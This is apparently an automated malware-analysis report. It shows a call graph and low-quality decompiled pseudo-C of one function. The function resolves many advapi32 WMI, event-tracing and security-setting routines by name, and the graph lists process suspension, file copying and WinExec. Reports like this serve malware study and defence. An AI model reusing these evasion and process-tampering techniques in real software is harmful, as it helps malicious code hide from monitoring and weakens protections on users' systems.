2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514cb0 755->845 846 2527e3b-2527e80 call 2514c24 call 2514d64 call 2514a98 call 2518110 755->846 853 25277d4-2527b9e call 2514c24 call 2514d64 call 2514a98 call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514d64 call 2512fc4 call 2514d64 CopyFileA call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 252540c call 25148f4 call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2513c30 call 2514c24 call 251304c call 2517c64 call 2514bb0 call 251304c call 2517c64 call 2514bb0 call 2525ac0 call 2514c24 call 2514d64 call 2514a98 call 2521c04 776->853 854 25277ad-25277cf call 2514d64 call 2514a98 call 2525698 776->854 1275 252900a-2529019 call 2514cb0 845->1275 1276 252934e-25293d6 call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514cb0 845->1276 846->845 879 2527e86-2527ea3 call 2514a98 call 2518134 846->879 1243 2527ba1-2527bb8 call 2513c60 853->1243 854->853 894 2528535-2528744 call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2513c30 call 251304c call 2517c64 call 2514c24 call 2514d64 call 2514a98 call 2513c60 879->894 895 2527ea9-252827d call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514c24 call 2514d64 call 2514a98 call 2514c24 call 2514d64 call 2514a98 call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2525540 call 25148f4 call 2525698 call 2525540 call 25148f4 call 2525698 call 2514c24 call 2525698 call 2513c30 call 251304c call 2517c64 call 2514c24 call 2514d64 call 2514a98 call 2513c60 879->895 1275->1276 1281 252901f-252902e call 2514cb0 1275->1281 1310 2529841-25298c9 call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514cb0 1276->1310 1311 25293dc-25293eb call 2514cb0 1276->1311 1281->1276 1287 2529034-2529349 call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514a98 * 2 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514a98 * 2 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514a98 * 2 call 25236cc call 2514dbc call 2524f34 1281->1287 1287->1276 1361 2529a11-2529e29 call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514a98 * 2 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514a98 * 2 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514a98 * 2 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514a98 * 2 call 25236cc 1310->1361 1362 25298cf-25298de call 2514cb0 1310->1362 1311->1310 1320 25293f1-2529400 call 2514cb0 1311->1320 1320->1310 1329 2529406-252983c call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc WinExec call 25245f8 OpenProcess NtSuspendProcess call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514dbc call 2523f94 call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514a98 * 2 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514a98 * 2 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514a98 * 2 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc 1320->1329 1329->1310 1695 2529e2e-252a65b call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 1361->1695 1362->1361 1373 25298e4-25298f3 call 2514cb0 1362->1373 1373->1361 1386 25298f9-2529a0c call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2512fc4 call 2514dbc call 25248a4 1373->1386 1386->1361 1941 252a660-252a667 call 25236cc 1695->1941 1943 252a66c-252a6d4 call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 1941->1943 1955 252a6d9-252a6e0 call 25236cc 1943->1955 1957 252a6e5-252a707 call 2514a98 * 2 1955->1957 1961 252a70c-252a713 call 25236cc 1957->1961 1963 252a718-252a7ac call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc 1961->1963 1981 252a7b1-252a7b3 ExitProcess 1963->1981
                                                                C-Code - Quality: 55%
                                                                			E02525DE4(void* __ebx, void* __edi, void* __esi, void* __fp0) {
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				char _v152;
				char _v156;
				char _v160;
				char _v164;
				char _v168;
				char _v172;
				char _v176;
				char _v180;
				char _v184;
				char _v188;
				char _v192;
				char _v196;
				char _v200;
				char _v204;
				char _v208;
				char _v212;
				char _v216;
				char _v220;
				char _v224;
				char _v228;
				char _v232;
				char _v236;
				char _v240;
				char _v244;
				char _v248;
				char _v252;
				char _v256;
				char _v260;
				char _v264;
				char _v268;
				char _v272;
				char _v276;
				char _v280;
				char _v284;
				char _v288;
				char _v292;
				char _v296;
				char _v300;
				char _v304;
				char _v308;
				char _v312;
				char _v316;
				char _v320;
				char _v324;
				char _v328;
				char _v332;
				char _v336;
				char _v340;
				char _v344;
				char _v348;
				char _v352;
				char _v356;
				char _v360;
				char _v364;
				char _v368;
				char _v372;
				char _v376;
				char _v380;
				char _v384;
				char _v388;
				char _v392;
				char _v396;
				char _v400;
				char _v404;
				char _v408;
				char _v412;
				char _v416;
				char _v420;
				char _v424;
				char _v428;
				char _v432;
				char _v436;
				char _v440;
				char _v444;
				char _v448;
				char _v452;
				char _v456;
				char _v460;
				char _v464;
				char _v468;
				char _v472;
				char _v476;
				char _v480;
				char _v484;
				char _v488;
				char _v492;
				intOrPtr _v496;
				char _v500;
				char _v504;
				char _v508;
				intOrPtr _v512;
				char _v516;
				char _v520;
				char _v524;
				intOrPtr _v528;
				char _v532;
				char _v536;
				char _v540;
				intOrPtr _v544;
				char _v548;
				char _v552;
				char _v556;
				char _v560;
				intOrPtr* _v564;
				char _v568;
				intOrPtr _v572;
				char _v576;
				char _v580;
				char _v584;
				intOrPtr _v588;
				char _v592;
				char _v596;
				char _v600;
				intOrPtr _v604;
				char _v608;
				char _v612;
				char _v616;
				intOrPtr _v620;
				char _v624;
				char _v628;
				char _v632;
				char _v636;
				char _v640;
				char _v644;
				char _v648;
				char _v652;
				char _v656;
				char _v660;
				char _v664;
				char _v668;
				char _v672;
				char _v676;
				char _v680;
				char _v684;
				char _v688;
				char _v692;
				char _v696;
				char _v700;
				char _v704;
				char _v708;
				intOrPtr _v712;
				char _v716;
				char _v720;
				char _v724;
				intOrPtr _v728;
				char _v732;
				char _v736;
				char _v740;
				intOrPtr _v744;
				char _v748;
				char _v752;
				char _v756;
				intOrPtr _v760;
				char _v764;
				char _v768;
				char _v772;
				char _v776;
				char _v780;
				intOrPtr _v784;
				char _v788;
				char _v792;
				char _v796;
				char _v800;
				char _v804;
				intOrPtr _v808;
				char _v812;
				char _v816;
				char _v820;
				intOrPtr _v824;
				char _v828;
				char _v832;
				char _v836;
				intOrPtr _v840;
				char _v844;
				char _v848;
				char _v852;
				char _v856;
				char _v860;
				intOrPtr _v864;
				char _v868;
				char _v872;
				char _v876;
				intOrPtr _v880;
				char _v884;
				char _v888;
				intOrPtr _v892;
				char _v896;
				char _v900;
				char _v904;
				intOrPtr _v908;
				char _v912;
				char _v916;
				intOrPtr _v920;
				char _v924;
				intOrPtr _v928;
				char _v932;
				intOrPtr _v936;
				char _v940;
				char _v944;
				char _v948;
				intOrPtr _v952;
				char _v956;
				char _v960;
				char _v964;
				char _v968;
				char _v972;
				char _v976;
				char _v980;
				char _v984;
				char _v988;
				char _v992;
				char _v996;
				intOrPtr _v1000;
				char _v1004;
				char _v1008;
				void* _v1012;
				char _v1016;
				char _v1020;
				char _v1024;
				char _v1028;
				char _v1032;
				intOrPtr _v1036;
				char _v1040;
				char _v1076;
				intOrPtr _v1080;
				char _v1084;
				char _v1088;
				char _v1092;
				intOrPtr _v1096;
				char _v1100;
				char _v1104;
				char _v1108;
				intOrPtr _v1112;
				char _v1116;
				char _v1120;
				char _v1124;
				intOrPtr _v1128;
				char _v1132;
				char _v1136;
				intOrPtr _v1140;
				char _v1144;
				char _v1148;
				char _v1152;
				intOrPtr _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				intOrPtr _v1172;
				char _v1176;
				char _v1180;
				intOrPtr _v1184;
				intOrPtr _v1188;
				intOrPtr _v1192;
				char _v1196;
				intOrPtr _v1200;
				char _v1204;
				char _v1208;
				char _v1212;
				char _v1216;
				intOrPtr _v1220;
				char _v1224;
				char _v1228;
				intOrPtr _v1232;
				char _v1268;
				char _v1552;
				intOrPtr _v1556;
				char _v1560;
				char _v1564;
				char _v1568;
				intOrPtr _v1572;
				char _v1576;
				char _v1580;
				char _v1584;
				intOrPtr _v1588;
				char _v1592;
				char _v1596;
				char _v1600;
				char _v1604;
				intOrPtr _v1608;
				char _v1704;
				intOrPtr _v1708;
				char _v1712;
				char _v1716;
				char _v1720;
				intOrPtr _v1724;
				char _v1728;
				char _v1732;
				char _v1736;
				intOrPtr _v1740;
				char _v1744;
				char _v1748;
				char _v1752;
				char _v1756;
				char _v1760;
				char _v1764;
				char _v1768;
				intOrPtr _v1772;
				char _v1776;
				char _v1780;
				char _v1784;
				intOrPtr _v1788;
				char _v1792;
				char _v1796;
				char _v1800;
				intOrPtr _v1804;
				char _v1808;
				char _v1812;
				char _v1816;
				intOrPtr _v1820;
				char _v1824;
				char _v1828;
				char _v1832;
				intOrPtr _v1836;
				char _v1840;
				char _v1844;
				char _v1848;
				intOrPtr _v1852;
				char _v1856;
				char _v1860;
				char _v1864;
				intOrPtr _v1868;
				char _v1872;
				char _v1876;
				char _v1880;
				intOrPtr _v1884;
				char _v1888;
				char _v1892;
				char _v1896;
				char _v1900;
				char _v1904;
				intOrPtr _v1908;
				char _v1912;
				char _v1916;
				char _v1920;
				char _v1924;
				char _v1928;
				intOrPtr _v1932;
				char _v1936;
				char _v1940;
				char _v1944;
				char _v1948;
				char _v1952;
				intOrPtr _v1956;
				char _v1960;
				char _v1964;
				char _v1968;
				intOrPtr _v1972;
				char _v1976;
				char _v1980;
				char _v1984;
				intOrPtr _v1988;
				char _v1992;
				char _v1996;
				char _v2000;
				intOrPtr _v2004;
				char _v2008;
				char _v2012;
				char _v2016;
				intOrPtr _v2020;
				char _v2024;
				char _v2028;
				char _v2032;
				char _v2036;
				char _v2040;
				intOrPtr _v2044;
				char _v2048;
				char _v2052;
				char _v2056;
				char _v2060;
				char _v2064;
				intOrPtr _v2068;
				char _v2072;
				char _v2076;
				char _v2080;
				char _v2084;
				char _v2088;
				intOrPtr _v2092;
				char _v2096;
				char _v2100;
				char _v2104;
				intOrPtr _v2108;
				char _v2112;
				char _v2116;
				char _v2120;
				intOrPtr _v2124;
				char _v2128;
				char _v2132;
				char _v2136;
				intOrPtr _v2140;
				char _v2144;
				char _v2148;
				char _v2152;
				char _v2156;
				intOrPtr _v2160;
				char _v2164;
				char _v2168;
				char _v2172;
				char _v2176;
				char _v2180;
				intOrPtr _v2184;
				char _v2188;
				char _v2192;
				char _v2196;
				char _v2200;
				char _v2204;
				intOrPtr _v2208;
				char _v2212;
				char _v2216;
				char _v2220;
				char _v2224;
				char _v2228;
				intOrPtr _v2232;
				char _v2236;
				char _v2240;
				char _v2244;
				char _v2248;
				char _v2252;
				char _v2256;
				char _v2260;
				intOrPtr _v2264;
				char _v2268;
				char _v2272;
				char _v2276;
				intOrPtr _v2280;
				char _v2284;
				char _v2288;
				char _v2292;
				char _v2296;
				char _v2300;
				char _v2304;
				char _v2308;
				char _v2312;
				char _v2316;
				char _v2320;
				char _v2324;
				char _v2328;
				char _v2332;
				char _v2336;
				char _v2340;
				char _v2344;
				char _v2348;
				char _v2352;
				char _v2356;
				char _v2360;
				char _v2364;
				char _v2368;
				char _v2372;
				char _v2376;
				char _v2380;
				char _v2384;
				char _v2388;
				char _v2392;
				char _v2396;
				char _v2400;
				char _v2404;
				char _v2408;
				char _v2412;
				char _v2416;
				char _v2420;
				char _v2424;
				char _v2428;
				char _v2432;
				char _v2436;
				char _v2440;
				char _v2444;
				char _v2448;
				char _v2452;
				char _v2456;
				char _v2460;
				char _v2464;
				char _v2468;
				char _v2472;
				char _v2476;
				char _v2480;
				char _v2484;
				char _v2488;
				char _v2492;
				char _v2496;
				char _v2500;
				char _v2504;
				char _v2508;
				char _v2512;
				char _v2516;
				char _v2520;
				char _v2524;
				char _v2528;
				char _v2532;
				char _v2536;
				char _v2540;
				char _v2544;
				char _v2548;
				char _v2552;
				char _v2556;
				char _v2560;
				char _v2564;
				char _v2568;
				char _v2572;
				char _v2576;
				char _v2580;
				char _v2584;
				char _v2588;
				char _v2592;
				char _v2596;
				char _v2600;
				char _v2604;
				char _v2608;
				char _v2612;
				intOrPtr _v2616;
				char _v2620;
				char _v2624;
				char _v2628;
				intOrPtr _v2632;
				char _v2636;
				char _v2640;
				char _v2644;
				char _v2648;
				char _v2652;
				char _v2656;
				char _v2660;
				char _v2664;
				char _v2668;
				char _v2672;
				void* _t1499;
				intOrPtr* _t1565;
				intOrPtr _t1566;
				intOrPtr _t1582;
				void* _t1583;
				char* _t1617;
				intOrPtr _t1626;
				void* _t1630;
				intOrPtr _t1635;
				void* _t1642;
				intOrPtr _t1643;
				intOrPtr _t1647;
				intOrPtr _t1649;
				void* _t1650;
				intOrPtr _t1709;
				signed char _t1710;
				intOrPtr _t1712;
				void* _t1713;
				intOrPtr _t1714;
				intOrPtr _t1718;
				intOrPtr _t1738;
				intOrPtr _t1804;
				intOrPtr _t1810;
				intOrPtr _t1811;
				intOrPtr _t1827;
				intOrPtr _t1871;
				intOrPtr _t1915;
				intOrPtr _t1919;
				void* _t1920;
				intOrPtr _t1921;
				intOrPtr _t1925;
				intOrPtr _t2001;
				intOrPtr _t2017;
				intOrPtr _t2033;
				intOrPtr _t2490;
				intOrPtr _t2492;
				void* _t2526;
				void* _t2527;
				intOrPtr _t2529;
				intOrPtr _t2531;
				long _t2564;
				intOrPtr _t2566;
				void* _t2582;
				intOrPtr _t2583;
				intOrPtr _t2662;
				intOrPtr _t2664;
				intOrPtr* _t2766;
				intOrPtr* _t2770;
				intOrPtr* _t2820;
				intOrPtr* _t2827;
				intOrPtr _t2830;
				intOrPtr _t2907;
				intOrPtr _t2913;
				intOrPtr* _t2925;
				intOrPtr* _t2932;
				intOrPtr _t2935;
				intOrPtr _t2937;
				intOrPtr _t2979;
				intOrPtr _t3015;
				CHAR* _t3016;
				intOrPtr _t3044;
				intOrPtr* _t3065;
				intOrPtr* _t3068;
				intOrPtr* _t3076;
				intOrPtr* _t3084;
				intOrPtr _t3086;
				intOrPtr* _t3093;
				intOrPtr _t3096;
				intOrPtr _t3098;
				intOrPtr _t3102;
				intOrPtr _t3104;
				intOrPtr _t3110;
				void* _t3117;
				intOrPtr _t3118;
				intOrPtr _t3122;
				intOrPtr _t3145;
				intOrPtr _t3149;
				char* _t3190;
				intOrPtr _t3199;
				intOrPtr _t3211;
				intOrPtr* _t3212;
				intOrPtr _t3213;
				intOrPtr* _t3215;
				intOrPtr* _t3216;
				void* _t3218;
				intOrPtr _t3221;
				intOrPtr _t3222;
				intOrPtr _t3223;
				intOrPtr _t3224;
				intOrPtr _t3227;
				intOrPtr _t3228;
				intOrPtr _t3229;
				intOrPtr _t3232;
				intOrPtr _t3234;
				intOrPtr _t3235;
				intOrPtr _t3236;
				intOrPtr _t3237;
				intOrPtr _t3239;
				intOrPtr _t3241;
				intOrPtr _t3242;
				intOrPtr _t3243;
				intOrPtr _t3244;
				intOrPtr _t3247;
				intOrPtr _t3248;
				intOrPtr _t3249;
				intOrPtr _t3250;
				intOrPtr _t3251;
				intOrPtr _t3252;
				intOrPtr _t3253;
				intOrPtr _t3256;
				intOrPtr _t3257;
				intOrPtr _t3258;
				intOrPtr _t3259;
				intOrPtr _t3260;
				intOrPtr _t3261;
				intOrPtr _t3262;
				intOrPtr _t3263;
				intOrPtr _t3264;
				intOrPtr _t3265;
				intOrPtr _t3266;
				intOrPtr _t3267;
				intOrPtr _t3268;
				intOrPtr _t3269;
				intOrPtr _t3270;
				intOrPtr _t3271;
				intOrPtr _t3272;
				intOrPtr _t3273;
				intOrPtr _t3274;
				intOrPtr _t3275;
				intOrPtr _t3276;
				intOrPtr _t3277;
				intOrPtr _t3278;
				intOrPtr _t3279;
				intOrPtr _t3280;
				intOrPtr _t3281;
				intOrPtr _t3282;
				intOrPtr _t3283;
				intOrPtr _t3284;
				intOrPtr _t3285;
				intOrPtr _t3286;
				intOrPtr _t3287;
				intOrPtr _t3292;
				intOrPtr _t3293;
				intOrPtr _t3294;
				intOrPtr _t3295;
				intOrPtr _t3302;
				intOrPtr _t3303;
				intOrPtr _t3304;
				intOrPtr _t3305;
				intOrPtr _t3307;
				intOrPtr _t3318;
				intOrPtr _t3320;
				intOrPtr _t3322;
				intOrPtr _t3330;
				intOrPtr _t3332;
				intOrPtr _t3334;
				void* _t3340;
				void* _t3343;
				void* _t3346;
				void* _t3349;
				void* _t3352;
				void* _t3355;
				void* _t3358;
				void* _t3361;
				void* _t3364;
				void* _t3367;
				void* _t3370;
				void* _t3373;
				void* _t3376;
				void* _t3379;
				void* _t3382;
				void* _t3385;
				void* _t3388;
				void* _t3391;
				void* _t3394;
				void* _t3397;
				void* _t3400;
				void* _t3403;
				void* _t3406;
				void* _t3409;
				void* _t3412;
				void* _t3415;
				void* _t3418;
				void* _t3421;
				void* _t3424;
				void* _t3427;
				void* _t3430;
				void* _t3433;
				void* _t3436;
				void* _t3439;
				void* _t3442;
				void* _t3445;
				void* _t3448;
				void* _t3451;
				void* _t3454;
				void* _t3457;
				void* _t3460;
				void* _t3463;
				void* _t3466;
				void* _t3469;
				void* _t3472;
				void* _t3475;
				void* _t3478;
				void* _t3481;
				void* _t3484;
				void* _t3490;
				void* _t3495;
				void* _t3500;
				void* _t3505;
				void* _t3514;
				void* _t3519;
				void* _t3524;
				intOrPtr _t3532;
				void* _t3540;
				void* _t3545;
				void* _t3550;
				void* _t3556;
				void* _t3565;
				intOrPtr _t3566;
				intOrPtr _t3569;
				intOrPtr _t3571;
				intOrPtr _t3573;
				intOrPtr _t3575;
				intOrPtr _t3577;
				intOrPtr _t3579;
				intOrPtr _t3581;
				intOrPtr _t3583;
				intOrPtr _t3585;
				void* _t3591;
				void* _t3596;
				void* _t3601;
				void* _t3609;
				void* _t3615;
				void* _t3620;
				void* _t3625;
				void* _t3631;
				void* _t3636;
				void* _t3641;
				intOrPtr _t3642;
				void* _t3653;
				void* _t3658;
				void* _t3663;
				void* _t3668;
				void* _t3673;
				void* _t3679;
				void* _t3685;
				void* _t3691;
				void* _t3694;
				void* _t3699;
				void* _t3702;
				void* _t3707;
				void* _t3710;
				void* _t3715;
				void* _t3718;
				void* _t3721;
				void* _t3726;
				void* _t3731;
				void* _t3734;
				void* _t3737;
				void* _t3740;
				void* _t3743;
				void* _t3746;
				void* _t3749;
				void* _t3752;
				void* _t3755;
				void* _t3758;
				void* _t3761;
				void* _t3764;
				void* _t3767;
				void* _t3770;
				void* _t3773;
				void* _t3776;
				void* _t3779;
				void* _t3782;
				void* _t3785;
				void* _t3788;
				void* _t3791;
				void* _t3794;
				void* _t3797;
				void* _t3800;
				void* _t3803;
				void* _t3806;
				void* _t3809;
				void* _t3812;
				void* _t3815;
				void* _t3818;
				void* _t3821;
				void* _t3824;
				void* _t3827;
				void* _t3830;
				void* _t3833;
				void* _t3836;
				void* _t3839;
				void* _t3842;
				void* _t3845;
				void* _t3848;
				void* _t3851;
				void* _t3856;
				void* _t3861;
				void* _t3864;
				void* _t3867;
				void* _t3870;
				void* _t3873;
				void* _t3880;
				void* _t3885;
				void* _t3894;
				void* _t3899;
				void* _t3904;
				void* _t3910;
				void* _t3913;
				void* _t3918;
				void* _t3921;
				void* _t3926;
				void* _t3929;
				void* _t3934;
				void* _t3941;
				void* _t3946;
				void* _t3951;
				void* _t3954;
				void* _t3959;
				void* _t3962;
				void* _t3967;
				void* _t3970;
				void* _t3978;
				void* _t3983;
				void* _t3988;
				intOrPtr _t3995;
				void* _t4000;
				void* _t4005;
				void* _t4010;
				void* _t4021;
				intOrPtr _t4024;
				intOrPtr _t4027;
				intOrPtr _t4029;
				intOrPtr _t4036;
				void* _t4044;
				void* _t4049;
				void* _t4058;
				void* _t4063;
				void* _t4067;
				void* _t4070;
				void* _t4073;
				void* _t4080;
				intOrPtr _t4095;
				intOrPtr _t4101;
				void* _t4107;
				void* _t4110;
				void* _t4113;
				void* _t4120;
				void* _t4123;
				void* _t4126;
				void* _t4131;
				intOrPtr _t4132;
				void* _t4137;
				intOrPtr _t4140;
				intOrPtr _t4141;
				intOrPtr* _t4149;
				void* _t4158;

				_t4158 = __fp0;
				_t4138 = __esi;
				_t4137 = __edi;
				_t3210 = __ebx;
				_t4140 = _t4141;
				_t3218 = 0x14d;
				do {
					_push(0);
					_push(0);
					_t3218 = _t3218 - 1;
				} while (_t3218 != 0);
				_push(_t3218);
				_push(__ebx);
				_push(_t4140);
				_push(0x252a8da);
				_push( *[fs:eax]);
				 *[fs:eax] = _t4141;
				if(E0251304C(0x270e) == 1) {
					L51:
					__eflags = 0;
					_pop(_t3322);
					 *[fs:eax] = _t3322;
					_push(E0252A8E4);
					E025148C4( &_v2672, 0x64);
					E025148C4( &_v2272, 0x63);
					E025148A0( &_v1864);
					E025148C4( &_v1876, 3);
					E025148C4( &_v1860, 0x54);
					E025148C4( &_v1268, 0xd);
					E025148C4( &_v1216, 0x64);
					E025148C4( &_v816, 5);
					_t3330 =  *0x25251f8; // 0x25251fc
					E02515A10( &_v796, _t3330);
					E025148C4( &_v792, 0x1e);
					_t3332 =  *0x25251f8; // 0x25251fc
					E02515A10( &_v672, _t3332);
					E025148C4( &_v668, 8);
					_t3334 =  *0x25251f8; // 0x25251fc
					E02515A10( &_v636, _t3334);
					E025148C4( &_v632, 0x11);
					E025148C4( &_v560, 0x24);
					E025148A0( &_v412);
					E025148A0( &_v416);
					return E025148C4( &_v408, 0x4e);
				} else {
					E02513024();
					E02514A98( &_v100, "WmiReceiveNotificationsW");
					_push(_v100);
					E02514A98( &_v104, "advapi32");
					_pop(_t3340); // executed
					E025236CC(_v104, __ebx, _t3340, __esi); // executed
					E02514A98( &_v108, "WmiReceiveNotificationsA");
					_push(_v108);
					E02514A98( &_v112, "advapi32");
					_pop(_t3343); // executed
					E025236CC(_v112, __ebx, _t3343, __esi); // executed
					E02514A98( &_v116, "WmiQuerySingleInstanceW");
					_push(_v116);
					E02514A98( &_v120, "advapi32");
					_pop(_t3346);
					E025236CC(_v120, __ebx, _t3346, __esi);
					E02514A98( &_v124, "NotifyChangeEventLog");
					_push(_v124);
					E02514A98( &_v128, "advapi32");
					_pop(_t3349);
					E025236CC(_v128, _t3210, _t3349, __esi);
					E02514A98( &_v132, "WmiQueryAllDataA");
					_push(_v132);
					E02514A98( &_v136, "advapi32");
					_pop(_t3352);
					E025236CC(_v136, _t3210, _t3352, _t4138);
					E02514A98( &_v140, "WmiOpenBlock");
					_push(_v140);
					E02514A98( &_v144, "advapi32");
					_pop(_t3355);
					E025236CC(_v144, _t3210, _t3355, _t4138);
					E02514A98( &_v148, "WmiNotificationRegistrationW");
					_push(_v148);
					E02514A98( &_v152, "advapi32");
					_pop(_t3358);
					E025236CC(_v152, _t3210, _t3358, _t4138);
					E02514A98( &_v156, "TraceQueryInformation");
					_push(_v156);
					E02514A98( &_v160, "advapi32");
					_pop(_t3361);
					E025236CC(_v160, _t3210, _t3361, _t4138);
					E02514A98( &_v164, "TraceSetInformation");
					_push(_v164);
					E02514A98( &_v168, "advapi32");
					_pop(_t3364);
					E025236CC(_v168, _t3210, _t3364, _t4138);
					E02514A98( &_v172, "TraceMessageVa");
					_push(_v172);
					E02514A98( &_v176, "advapi32");
					_pop(_t3367);
					E025236CC(_v176, _t3210, _t3367, _t4138);
					E02514A98( &_v180, "TraceMessage");
					_push(_v180);
					E02514A98( &_v184, "advapi32");
					_pop(_t3370);
					E025236CC(_v184, _t3210, _t3370, _t4138);
					E02514A98( &_v188, "TraceEvent");
					_push(_v188);
					E02514A98( &_v192, "advapi32");
					_pop(_t3373);
					E025236CC(_v192, _t3210, _t3373, _t4138);
					E02514A98( &_v196, "TraceEventInstance");
					_push(_v196);
					E02514A98( &_v200, "advapi32");
					_pop(_t3376);
					E025236CC(_v200, _t3210, _t3376, _t4138);
					E02514A98( &_v204, "SetTraceCallback");
					_push(_v204);
					E02514A98( &_v208, "advapi32");
					_pop(_t3379);
					E025236CC(_v208, _t3210, _t3379, _t4138);
					E02514A98( &_v212, "SetSecurityInfo");
					_push(_v212);
					E02514A98( &_v216, "advapi32");
					_pop(_t3382);
					E025236CC(_v216, _t3210, _t3382, _t4138);
					E02514A98( &_v220, "SetSecurityInfoExA");
					_push(_v220);
					E02514A98( &_v224, "advapi32");
					_pop(_t3385);
					E025236CC(_v224, _t3210, _t3385, _t4138);
					E02514A98( &_v228, "SetSecurityInfoExW");
					_push(_v228);
					E02514A98( &_v232, "advapi32");
					_pop(_t3388);
					E025236CC(_v232, _t3210, _t3388, _t4138);
					E02514A98( &_v236, "SetSecurityAccessMask");
					_push(_v236);
					E02514A98( &_v240, "advapi32");
					_pop(_t3391);
					E025236CC(_v240, _t3210, _t3391, _t4138);
					E02514A98( &_v244, "SetPrivateObjectSecurityEx");
					_push(_v244);
					E02514A98( &_v248, "advapi32");
					_pop(_t3394);
					E025236CC(_v248, _t3210, _t3394, _t4138);
					E02514A98( &_v252, "SetKernelObjectSecurity");
					_push(_v252);
					E02514A98( &_v256, "advapi32");
					_pop(_t3397);
					E025236CC(_v256, _t3210, _t3397, _t4138);
					E02514A98( &_v260, "SetFileSecurityW");
					_push(_v260);
					E02514A98( &_v264, "advapi32");
					_pop(_t3400);
					E025236CC(_v264, _t3210, _t3400, _t4138);
					E02514A98( &_v268, "SetFileSecurityA");
					_push(_v268);
					E02514A98( &_v272, "advapi32");
					_pop(_t3403);
					E025236CC(_v272, _t3210, _t3403, _t4138);
					E02514A98( &_v276, "SaferSetPolicyInformation");
					_push(_v276);
					E02514A98( &_v280, "advapi32");
					_pop(_t3406);
